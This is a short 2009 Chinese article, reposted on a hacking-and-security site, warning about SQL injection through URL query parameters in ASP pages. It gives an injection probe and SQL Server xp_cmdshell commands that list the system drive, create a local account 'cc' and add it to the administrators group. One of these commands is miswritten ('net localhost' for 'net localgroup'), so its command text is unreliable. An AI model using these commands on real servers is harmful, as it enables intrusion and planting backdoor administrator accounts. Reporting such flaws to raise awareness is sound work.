欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

安全专家:不可忽视URL漏洞

来源:本站转载 作者:佚名 时间:2009-09-14 TAG: 我要投稿
前些时候,公安机关破获了一家网络公司的程序被盗的案件,分析了一下,主要问题还是出在URL漏洞上。 

  测试程序是否存在URL漏洞,最简单的方法就是在Request.QueryString上加一个’,如 show.asp?id=1 ,改成 show.asp?id=1’ ,打开IE高级选项中的“显示友好HTTP错误信息”,看看是不是显示了“字符串 ’’ 之前有未闭合的引号”? 

  如果数据库是SQLSERVER,试试在查询分析器里执行以下指令:exec master.dbo.xp_cmdshell dir c: 

  黑客便可利用exec master.dbo.xp_cmdshell 干任何事情了,那么利用这个指令,便很轻松的在您的系统内建立用户 exec master.dbo.xp_cmdshell ’net user cc cc /add’ ; exec master.dbo.xp_cmdshell ’net localhost administrators cc /add’,以后的事情就不得而知了。 
【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载